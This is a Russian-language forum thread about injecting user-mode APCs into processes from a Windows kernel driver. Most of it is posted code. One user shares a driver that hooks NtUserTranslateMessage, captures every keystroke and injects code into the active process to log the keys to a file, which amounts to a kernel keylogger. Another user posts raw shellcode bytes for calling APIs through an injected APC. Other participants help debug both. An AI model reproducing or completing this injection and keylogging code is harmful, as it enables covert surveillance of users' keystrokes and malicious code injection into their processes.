запуск процесса из ядра

На сколько я понял, Вы хотите сказать что в Win2003 sp2,все процессы зашищены и прямой инжект АРС туда не возможен....

Можете кинуть ссылку где почитать про обход зашищенных процессов?? и все с этим связанное??

 

Нет, не все. Если у тебя не работает инжект в пользовательские процессы - ищи ошибки в реализации.
PS. Вышеприведенный код не смотрел, реализация своя, так что хз по поводу него.

ссылка в статье есть, на автора какой-то тулзы. свой код публиковать не буду. исследуй, но как вижу по тексту выше - у тебя не работает и для пользовательских, не защищенных процессов. поэтому ищи ошибку в коде.

 

PS2: На форуме рсдна есть пример выложенный автором статьи.

 

Нет, в ХР работает на ура, а вот в Win2003 SP2 не хочет, могу кинуть код. Не работает вообще в для любых процессов в Win2003 SP2.

А про тулзу, скачать к сожалению уже нельзя...

 

Мне этот вариант, мне кажется не совсем подходит, так как код выполняется в различных процессах, срабатывание происходит после обработки перехвата NtUserTranslateMessage, код выполняется в контексте процесса, в котором был вызван мой обработчик....

 

0xFox
На мой взгляд вы не понимаете что такое аттач и используете его там где не нужно, вначале следует разобраться и только потом юзать, а не наоборот.

 

Ну хорошо, поправьте если не прав:
После вызова перехваченной функции, мы уже приаттачились к вызывающему процессу, находимся в его контексте... что мы можем на данном этапе?? я в этом месте вызываю инжект апц, чтобы перейти в юзермод, может есть другой способ обойтись без АПЦ?? подскажите

 

0xFox

Зачем ?

 

Вот код))) гляньте пожалуйста профессиональным взглядом

Обработчик

Код (Text):

1. BOOL MyNtUserTranslateMessage( LPMSG lpMsg, HKL dwhkl)
2. {
3.             BOOL result;
4.     CCHAR keys[260];
5.     WCHAR chr[10];
6.     ULONG res;
7.     PEPROCESS curEProc;
8.  
9.             result= g_OriginalNtUserTranslateMessage(lpMsg,dwhkl);
10.  
11.     DbgPrint("lpMsg->wParam = %c (0x%x), HKL = %x, lpMsg->lParam =%x, HWND = 0x%x \n",
12.                 lpMsg->wParam,
13.                 lpMsg->wParam,
14.                 dwhkl,
15.                 lpMsg->lParam,
16.                 lpMsg->hwnd);
17.  
18.     if (lpMsg->message == WM_KEYDOWN)
19.     {                        //Вызываем АПЦ для нахождения дополнительной информации и записи в файл
20.             InstallUserModeApc(lpMsg->wParam,
21.             lpMsg->lParam,
22.             KeGetCurrentThread(),/*FindThreadForInject();*/
23.             PsGetCurrentProcess());
24.     }
25.  
26.     return result;
27. }

И функция для установки АПЦ:

Код (Text):

1. NTSTATUS InstallUserModeApc(ULONG wParam, ULONG lParam, PKTHREAD pTargetThread, PEPROCESS pTargetProcess)
2. {
3.     PRKAPC      pApc            = NULL; //Our APC  
4.     ULONG       dwSize          = 0;//Size of code to be executed in Explorer's address space
5.     KAPC_STATE  ApcState;       // Needed for KeStackAttachProcess
6.     ULONG       *data_addr      = 0;
7.     ULONG       dwMappedAddress              = 0; //same as above
8.     NTSTATUS    Status          = STATUS_UNSUCCESSFUL;
9.     char        sczBuff[50];
10.     ULONG loadLibAddr,getProcAddr;
11.     RTL_OSVERSIONINFOEXW osVer;
12.  
13.     DbgPrint("Prtct_drv -> pTargetThread = 0x%x, pTargetProcess = 0x%x\n", pTargetThread, pTargetProcess);
14.  
15.     if (!pTargetThread || !pTargetProcess)
16.         return STATUS_UNSUCCESSFUL;
17.  
18.     //Allocate memory for our APC
19.     pApc = ExAllocatePool (NonPagedPool,sizeof (KAPC));
20.     if (!pApc)
21.     {
22.         DbgPrint("Prtct_drv -> Failed to allocate memory for the APC structure\n");
23.         return STATUS_INSUFFICIENT_RESOURCES;
24.     }
25.  
26.     dwSize = (unsigned char*)ApcInjectCodeEnd-(unsigned char*)ApcInjectCode;
27.     DbgPrint("Inject code size = 0x%x\n",dwSize);
28.    
29.     //Allocate an MDL describing our ApcCreateProcess' memory
30.     pMdl = IoAllocateMdl (ApcInjectCode, dwSize, FALSE,FALSE,NULL);
31.     if (!pMdl)
32.     {
33.         DbgPrint("Prtct_drv -> Failed to allocate MDL\n");
34.         ExFreePool (pApc);
35.         return STATUS_INSUFFICIENT_RESOURCES;
36.     }
37.    
38.     __try
39.     {
40.         //Probe the pages for Write access and make them memory resident
41.         MmProbeAndLockPages (pMdl,KernelMode,IoWriteAccess);
42.     }
43.     __except (EXCEPTION_EXECUTE_HANDLER)
44.     {
45.         DbgPrint("Prtct_drv -> Exception during MmProbeAndLockPages\n");
46.         IoFreeMdl (pMdl);
47.         ExFreePool (pApc);
48.         return STATUS_UNSUCCESSFUL;
49.     }
50.    
51.     KeStackAttachProcess(&(pTargetProcess->Pcb),&ApcState);
52.  
53.     //Now map the physical pages (our code) described by 'pMdl'
54.     pMappedAddress = MmMapLockedPagesSpecifyCache (pMdl,                                                                      UserMode,                                                 MmCached,
55.                                 NULL,                                                                             FALSE,                                                    NormalPagePriority);
56.    
57.     if (!pMappedAddress)
58.     {
59.         DbgPrint("Prtct_drv -> Cannot map address\n");
60.  
61.         KeUnstackDetachProcess (&ApcState);
62.         IoFreeMdl (pMdl);
63.         ExFreePool (pApc);
64.  
65.         return STATUS_UNSUCCESSFUL;
66.     }
67.     else
68.         DbgPrint("Prtct_drv -> UserMode memory at address: 0x%p\n",pMappedAddress);
69.  
70. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////  
71. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
72.     memset(&osVer,0,sizeof(RTL_OSVERSIONINFOEXW));
73.     osVer.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW);
74.     RtlGetVersion((PRTL_OSVERSIONINFOW)&osVer);
75.  
76.     if ( osVer.dwMajorVersion == 5 && osVer.dwMinorVersion == 2 )  
77.     {  
78.         DbgPrint("Prtct_drv: KERNEL32.DLL-> Running on Windows 2003\n");
79.         DbgPrint("Prtct_drv: KERNEL32.DLL-> SP = %d.%d\n",osVer.wServicePackMajor,osVer.wServicePackMinor);
80.  
81.         if (osVer.wServicePackMajor==2 && osVer.wServicePackMinor== 0)
82.         {//Win2003 SP2
83.             loadLibAddr = 0x7C801DCA;
84.             getProcAddr = 0x7C823D7A;
85.  
86.         }else if (osVer.wServicePackMajor==1 && osVer.wServicePackMinor== 0)
87.         {//Win2003 SP1
88.  
89.         }else if (osVer.wServicePackMajor==0 && osVer.wServicePackMinor== 0)
90.         {//Win2003 SP0
91.  
92.         }
93.  
94.     }  
95.     else if ( osVer.dwMajorVersion == 5 && osVer.dwMinorVersion == 1 )  
96.     {  
97.         DbgPrint("Prtct_drv: KERNEL32.DLL-> Running on Windows XP\n");
98.         DbgPrint("Prtct_drv: KERNEL32.DLL-> SP = %d.%d\n",osVer.wServicePackMajor,osVer.wServicePackMinor);
99.  
100.         if (osVer.wServicePackMajor==3 && osVer.wServicePackMinor== 0)
101.         {//XP SP3
102.             loadLibAddr = 0x7C801D7B;
103.             getProcAddr = 0x7C80AE40;
104.         }else if (osVer.wServicePackMajor==2 && osVer.wServicePackMinor== 0)
105.         {//XP SP2
106.  
107.         }else if (osVer.wServicePackMajor==1 && osVer.wServicePackMinor== 0)
108.         {//XP SP1
109.  
110.         }else if (osVer.wServicePackMajor==0 && osVer.wServicePackMinor== 0)
111.         {//XP SP0
112.  
113.         }
114.  
115.     }  
116.     else if ( osVer.dwMajorVersion == 5 && osVer.dwMinorVersion == 0 )  
117.     {  
118.         DbgPrint("Prtct_drv: KERNEL32.DLL-> Running on Windows 2000\n");
119.         DbgPrint("Prtct_drv: KERNEL32.DLL-> SP = %d.%d\n",osVer.wServicePackMajor,osVer.wServicePackMinor);
120.  
121.         if (osVer.wServicePackMajor==0 && osVer.wServicePackMinor== 0)
122.         {//Win2000 SP0
123.  
124.         }
125.  
126.     }  
127.  
128. ///////////////////////////////////////////////////////////////////////////////////////////////
129. /////////////////////////     Patching memory  ////////////////////////////////////////////////
130.  
131.     strcpy(sczBuff,"Andrew");
132.     memcpy((PVOID)((ULONG)pMappedAddress+0x15),&wParam,sizeof(wParam));
133.     memcpy((PVOID)((ULONG)pMappedAddress+0x15+sizeof(wParam)),&lParam,sizeof(lParam));
134.  
135.     memcpy((PVOID)((ULONG)pMappedAddress+0x15+sizeof(ULONG)*2),&loadLibAddr,sizeof(ULONG));
136.     memcpy((PVOID)((ULONG)pMappedAddress+0x15+sizeof(ULONG)*3),&getProcAddr,sizeof(ULONG));
137.  
138.     memcpy((PVOID)((ULONG)pMappedAddress+0x15+sizeof(ULONG)*4),sczBuff,6);
139.  
140. ///////////////////////////////////////////////////////////////////////////////////////////////
141. ///////////////////////////////////////////////////////////////////////////////////////////////
142.  
143.     KeUnstackDetachProcess (&ApcState);
144.     KeInitializeApc(pApc,pTargetThread,
145.                OriginalApcEnvironment,
146.                &ApcKernelRoutine,NULL,
147.                pMappedAddress, UserMode,
148.                (PVOID) NULL);
149.    
150.     if (!KeInsertQueueApc(pApc,0,NULL,0))
151.     {
152.         DbgPrint("KernelExec -> Failed to insert APC\n");
153.         MmUnlockPages(pMdl);
154.         IoFreeMdl (pMdl);
155.         ExFreePool (pApc);
156.         return STATUS_UNSUCCESSFUL;
157.     }
158.     else{
159.         DbgPrint("KernelExec -> APC delivered\n");
160.     }
161.  
162.     if(!pTargetThread->ApcState.UserApcPending)
163.     {
164.         pTargetThread->ApcState.UserApcPending = TRUE;
165.     }
166.  
167.     return 0;
168. }

Код в ХР работает, в Win2003 нет. В чем проблема?? подскажите

 

ЧТО ЭТО?! Подставляйте голову, будем рубить. За такой код нельзя оставлять в живых

 

)))) это временный вариант, жестко прописываю адреса функций, передаю их в апц функцию и а та уже использует их для нахождения адресов всех остальных функций. Пока просто еще не разбиралься с парсингом таблиц импорта...

Подскажите почему доставка АПЦ не работает??

 

А может это происходить по той причине, что используется не Alertable поток?? Дело в том что под ХР работает с любым потоком, а вот в Win2003 может быть нужен только Alertable thread?

 

0xFox
Может стоит про apc прочитать хотя бы в msdn, прежде чем кодить?

 

Добрый день, возникли проблемы с использованием APC для инжекта кода.
Код взял от сюда
http://www.debugman.com/discussion/3493/%E5%8F%91%E8%80%81%E4%BB%A3%E7%A0%81-r0-call-r3-api/p1
MessageBox вызывается от имени explorer нормально, но при выполнении кода например от notepad или calc (с одним потоком) после выполнения кода(в данном примере вызов MessageBox) процесс завершается.
Вопрос собственно почему завершается процесс?!

 

Скорее всего ты и заверщаешь процесс.
Закрой только созданный тобою поток.

 

шелкод заканчивается возвратом ret, никакого завершения потока нет

Код (Text):

1. CHAR szApiWrapperCode[] =
2. {
3.     0x60,                    //pushad;
4.     0x9C,                    //pushfd;
5.     0x55,                    //push    ebp
6.     0x8B, 0xEC,                //mov     ebp, esp
7.     0x8B, 0x45, 0x2C,       //mov     eax, dword ptr [ebp+0x2C]
8.     0x8B, 0x48, 0x08,       //mov     ecx, dword ptr [eax+8]
9.     0x8D, 0x70, 0x0C,       //lea     esi, dword ptr [eax+C]
10.     0xC1, 0xE1, 0x02,       //shl     ecx, 2
11.     0x2B, 0xE1,                //sub     esp, ecx
12.     0x8B, 0xFC,                //mov     edi, esp
13.     0x8B, 0x48, 0x08,        //mov     ecx, dword ptr [eax+8]
14.     0xFC,                    //cld
15.     0xF3, 0xA5,                //rep     movsd
16.     0x8B, 0x45, 0x2C,       //mov     eax, dword ptr [ebp+0x2C]
17.     0xFF, 0x10,                //call    dword ptr [eax]
18.     0x8B, 0x45, 0x2C,       //mov     eax, dword ptr [ebp+0x2C]
19.     0x8B, 0x40, 0x04,       //mov     eax, dword ptr [eax+4]
20.     0x83, 0xE8, 0x01,       //sub     eax, 1
21.     0x74, 0x04,                //je      _lable_cdcel_call
22.     0x5D,                    //pop     ebp
23.     0x9D,                    //popfd;
24.     0x61,                    //popad;
25.     0x33, 0xC0,                //xor      eax, eax;
26.     0xC2, 0x0C, 0x00,       //retn    0C
27.                             //_lable_cdcel_call:
28.     0x8B, 0x45, 0x2C,       //mov     eax, dword ptr [ebp+0x2C]
29.     0x8B, 0x40, 0x04,       //mov     eax, dword ptr [eax+4]
30.     0xC1, 0xE0, 0x02,       //shl     eax, 2
31.     0x03, 0xE0,                //add     esp, eax
32.     0x5D,                    //pop     ebp
33.     0x9D,                    //popfd;
34.     0x61,                    //popad;
35.     0x33, 0xC0,                //xor      eax, eax;
36.     0xC2, 0x0C, 0x00        //retn    0C
37. };

Также для проверки шелкод сделал из одной команды "ret". эффект тотже - приложение также закрывается.

 

Вот, забирайте.

 

Great
А откуда у многих такая любовь таскать за собой h-файл с PE-структурами? почему бы не использовать ntimage.h?

 

Я писал этио полтора года назад и не знал, что он есть)

 

Great

Спасибо за пример. но уже удалось заточить под свои нужды приведенный код